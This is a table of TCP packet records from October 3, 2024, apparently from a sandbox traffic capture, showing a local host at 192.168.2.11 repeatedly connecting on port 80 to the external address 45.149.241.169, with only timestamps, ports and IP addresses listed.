Oct 3, 2024 09:21:25.029166937 CEST | 80 | 64378 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:25.029227972 CEST | 64378 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:25.034338951 CEST | 80 | 64378 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:25.669203997 CEST | 80 | 64378 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:25.669226885 CEST | 80 | 64378 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:25.669334888 CEST | 64378 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:25.669445038 CEST | 64378 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:25.674220085 CEST | 80 | 64378 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:25.808263063 CEST | 64379 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:25.813195944 CEST | 80 | 64379 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:25.813307047 CEST | 64379 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:25.815433979 CEST | 64379 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:25.820269108 CEST | 80 | 64379 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:25.820374966 CEST | 64379 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:25.825217009 CEST | 80 | 64379 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:26.688807011 CEST | 80 | 64379 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:26.688957930 CEST | 80 | 64379 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:26.688957930 CEST | 64379 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:26.689008951 CEST | 64379 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:26.693892956 CEST | 80 | 64379 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:26.839411974 CEST | 64380 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:26.844430923 CEST | 80 | 64380 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:26.844552994 CEST | 64380 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:26.846657991 CEST | 64380 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:26.851516962 CEST | 80 | 64380 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:26.851586103 CEST | 64380 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:26.856379986 CEST | 80 | 64380 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:27.634349108 CEST | 80 | 64380 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:27.634529114 CEST | 80 | 64380 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:27.634586096 CEST | 64380 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:27.634634972 CEST | 64380 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:27.639570951 CEST | 80 | 64380 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:27.796695948 CEST | 64381 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:27.801590919 CEST | 80 | 64381 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:27.801700115 CEST | 64381 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:27.805084944 CEST | 64381 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:27.810060978 CEST | 80 | 64381 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:27.810226917 CEST | 64381 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:27.815283060 CEST | 80 | 64381 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:28.548094988 CEST | 80 | 64381 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:28.548333883 CEST | 64381 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:28.548427105 CEST | 80 | 64381 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:28.548512936 CEST | 64381 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:28.553342104 CEST | 80 | 64381 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:28.685456038 CEST | 64382 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:28.690521955 CEST | 80 | 64382 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:28.690726042 CEST | 64382 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:28.692899942 CEST | 64382 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:28.697794914 CEST | 80 | 64382 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:28.697925091 CEST | 64382 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:28.703325033 CEST | 80 | 64382 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:29.432213068 CEST | 80 | 64382 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:29.432230949 CEST | 80 | 64382 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:29.432240009 CEST | 80 | 64382 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:29.432337046 CEST | 64382 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:29.432396889 CEST | 64382 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:29.437160015 CEST | 80 | 64382 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:29.579591990 CEST | 64383 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:29.584657907 CEST | 80 | 64383 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:29.584817886 CEST | 64383 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:29.586962938 CEST | 64383 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:29.591722012 CEST | 80 | 64383 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:29.591806889 CEST | 64383 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:29.596569061 CEST | 80 | 64383 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:30.259722948 CEST | 80 | 64383 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:30.259852886 CEST | 80 | 64383 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:30.259881020 CEST | 64383 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:30.259915113 CEST | 64383 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:30.264753103 CEST | 80 | 64383 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:30.401187897 CEST | 64384 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:30.406111956 CEST | 80 | 64384 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:30.406224012 CEST | 64384 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:30.408480883 CEST | 64384 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:30.413429022 CEST | 80 | 64384 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:30.413511038 CEST | 64384 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:30.421405077 CEST | 80 | 64384 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:31.213476896 CEST | 80 | 64384 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:31.213525057 CEST | 80 | 64384 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:31.213756084 CEST | 64384 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:31.213756084 CEST | 64384 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:31.218884945 CEST | 80 | 64384 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:31.437197924 CEST | 64385 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:31.442122936 CEST | 80 | 64385 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:31.442192078 CEST | 64385 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:31.493468046 CEST | 64385 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:31.498548985 CEST | 80 | 64385 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:31.498785019 CEST | 64385 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:31.503812075 CEST | 80 | 64385 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:32.591485977 CEST | 80 | 64385 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:32.591532946 CEST | 80 | 64385 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:32.591567039 CEST | 80 | 64385 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:32.591620922 CEST | 80 | 64385 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:32.591622114 CEST | 64385 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:32.591646910 CEST | 64385 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:32.591676950 CEST | 64385 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:32.591737986 CEST | 64385 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:32.603313923 CEST | 80 | 64385 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:32.730734110 CEST | 64386 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:32.735788107 CEST | 80 | 64386 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:32.735914946 CEST | 64386 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:32.738049984 CEST | 64386 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:32.742938042 CEST | 80 | 64386 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:32.743030071 CEST | 64386 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:32.747910023 CEST | 80 | 64386 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:33.386100054 CEST | 80 | 64386 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:33.386162996 CEST | 80 | 64386 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:33.386243105 CEST | 64386 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:33.386312008 CEST | 64386 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:33.391128063 CEST | 80 | 64386 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:33.544037104 CEST | 64387 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:33.548964977 CEST | 80 | 64387 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:33.549132109 CEST | 64387 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:33.551290035 CEST | 64387 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:33.556114912 CEST | 80 | 64387 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:33.556186914 CEST | 64387 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:33.561033964 CEST | 80 | 64387 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:35.070835114 CEST | 80 | 64387 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:35.070897102 CEST | 80 | 64387 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:35.070961952 CEST | 64387 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:35.070998907 CEST | 80 | 64387 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:35.071001053 CEST | 64387 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:35.071048021 CEST | 64387 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:35.071057081 CEST | 80 | 64387 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:35.071113110 CEST | 64387 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:35.071317911 CEST | 80 | 64387 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:35.071376085 CEST | 64387 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:35.075961113 CEST | 80 | 64387 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:35.226890087 CEST | 64388 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:35.231770992 CEST | 80 | 64388 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:35.231879950 CEST | 64388 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:35.234649897 CEST | 64388 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:35.239480972 CEST | 80 | 64388 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:35.239656925 CEST | 64388 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:35.244488955 CEST | 80 | 64388 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:46.491751909 CEST | 80 | 64388 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:46.491935968 CEST | 64388 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:46.497212887 CEST | 80 | 64388 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:46.497302055 CEST | 64388 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:46.635451078 CEST | 64389 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:46.640335083 CEST | 80 | 64389 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:46.640459061 CEST | 64389 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:46.642540932 CEST | 64389 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:46.647428989 CEST | 80 | 64389 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:46.647500992 CEST | 64389 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:46.652298927 CEST | 80 | 64389 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:47.323739052 CEST | 80 | 64389 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:47.323792934 CEST | 80 | 64389 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:47.323869944 CEST | 64389 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:47.323951960 CEST | 64389 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:47.328778028 CEST | 80 | 64389 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:47.475168943 CEST | 64390 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:47.480048895 CEST | 80 | 64390 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:47.480123997 CEST | 64390 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:47.482239008 CEST | 64390 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:47.487018108 CEST | 80 | 64390 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:47.487101078 CEST | 64390 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:47.491822004 CEST | 80 | 64390 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:48.280944109 CEST | 80 | 64390 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:48.281086922 CEST | 80 | 64390 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:48.281111956 CEST | 64390 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:48.281152010 CEST | 64390 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:48.285933971 CEST | 80 | 64390 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:48.428493977 CEST | 64391 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:48.433464050 CEST | 80 | 64391 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:48.433594942 CEST | 64391 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:48.435915947 CEST | 64391 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:48.440732002 CEST | 80 | 64391 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:48.440835953 CEST | 64391 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:48.445628881 CEST | 80 | 64391 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:49.089157104 CEST | 80 | 64391 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:49.089190006 CEST | 80 | 64391 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:49.089315891 CEST | 64391 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:49.090689898 CEST | 64391 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:49.095496893 CEST | 80 | 64391 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:49.246395111 CEST | 64392 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:49.251543045 CEST | 80 | 64392 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:49.251696110 CEST | 64392 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:49.253714085 CEST | 64392 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:49.258609056 CEST | 80 | 64392 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:49.258711100 CEST | 64392 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:49.263506889 CEST | 80 | 64392 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:50.342468977 CEST | 80 | 64392 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:50.342504025 CEST | 80 | 64392 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:50.342534065 CEST | 80 | 64392 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:50.342572927 CEST | 64392 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:50.342605114 CEST | 64392 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:50.342633009 CEST | 80 | 64392 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:50.343709946 CEST | 64392 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:50.347537994 CEST | 80 | 64392 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:50.487448931 CEST | 64393 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:50.492552996 CEST | 80 | 64393 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:50.492674112 CEST | 64393 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:50.494801044 CEST | 64393 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:50.499613047 CEST | 80 | 64393 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:50.499694109 CEST | 64393 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:50.504566908 CEST | 80 | 64393 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:51.137919903 CEST | 80 | 64393 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:51.137959957 CEST | 80 | 64393 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:51.138044119 CEST | 64393 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:51.138096094 CEST | 64393 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:51.142841101 CEST | 80 | 64393 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:51.275259018 CEST | 64394 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:51.280193090 CEST | 80 | 64394 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:51.280438900 CEST | 64394 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:51.282442093 CEST | 64394 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:51.287404060 CEST | 80 | 64394 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:51.287565947 CEST | 64394 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:51.292344093 CEST | 80 | 64394 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:51.987176895 CEST | 80 | 64394 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:51.987230062 CEST | 80 | 64394 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:51.987281084 CEST | 64394 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:51.987358093 CEST | 64394 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:51.992201090 CEST | 80 | 64394 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:52.135682106 CEST | 64395 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:52.141613007 CEST | 80 | 64395 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:52.141722918 CEST | 64395 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:52.143836975 CEST | 64395 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:52.148648977 CEST | 80 | 64395 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:52.148747921 CEST | 64395 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:52.155999899 CEST | 80 | 64395 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:52.824364901 CEST | 80 | 64395 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:52.824383020 CEST | 80 | 64395 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:52.824431896 CEST | 64395 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:52.825124025 CEST | 64395 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:52.829890966 CEST | 80 | 64395 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:52.965944052 CEST | 64396 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:52.972373962 CEST | 80 | 64396 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:52.972479105 CEST | 64396 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:52.975395918 CEST | 64396 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:52.981678009 CEST | 80 | 64396 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:52.981934071 CEST | 64396 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:52.988246918 CEST | 80 | 64396 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:53.812876940 CEST | 80 | 64396 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:53.813082933 CEST | 80 | 64396 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:53.813148022 CEST | 64396 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:53.822036028 CEST | 64396 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:53.827050924 CEST | 80 | 64396 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:53.990683079 CEST | 64397 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:53.996016979 CEST | 80 | 64397 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:53.996141911 CEST | 64397 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:53.998188972 CEST | 64397 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:54.007059097 CEST | 80 | 64397 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:54.007169008 CEST | 64397 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:54.018230915 CEST | 80 | 64397 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:54.779628992 CEST | 80 | 64397 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:54.779942989 CEST | 64397 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:54.782118082 CEST | 80 | 64397 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:54.782200098 CEST | 64397 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:54.795139074 CEST | 80 | 64397 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:54.920120001 CEST | 64398 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:54.931772947 CEST | 80 | 64398 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:54.931854963 CEST | 64398 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:54.934883118 CEST | 64398 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:54.945014954 CEST | 80 | 64398 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:54.945255995 CEST | 64398 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:54.950891972 CEST | 80 | 64398 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:55.743837118 CEST | 80 | 64398 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:55.743930101 CEST | 64398 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:55.744573116 CEST | 80 | 64398 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:55.744620085 CEST | 64398 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:55.749129057 CEST | 80 | 64398 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:55.883899927 CEST | 64399 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:55.901117086 CEST | 80 | 64399 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:55.901206017 CEST | 64399 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:55.903311968 CEST | 64399 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:55.920159101 CEST | 80 | 64399 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:55.920208931 CEST | 64399 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:55.927974939 CEST | 80 | 64399 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:57.049427986 CEST | 80 | 64399 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:57.049463987 CEST | 80 | 64399 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:57.049612999 CEST | 64399 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:57.049612999 CEST | 64399 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:57.049904108 CEST | 80 | 64399 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:57.049988031 CEST | 64399 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:57.080375910 CEST | 80 | 64399 | 45.149.241.169 | 192.168.2.11 |
Oct 3, 2024 09:21:57.204463005 CEST | 64400 | 80 | 192.168.2.11 | 45.149.241.169 |
Oct 3, 2024 09:21:57.209675074 CEST | 80 | 64400 | 45.149.241.169 | 192.168.2.11 |
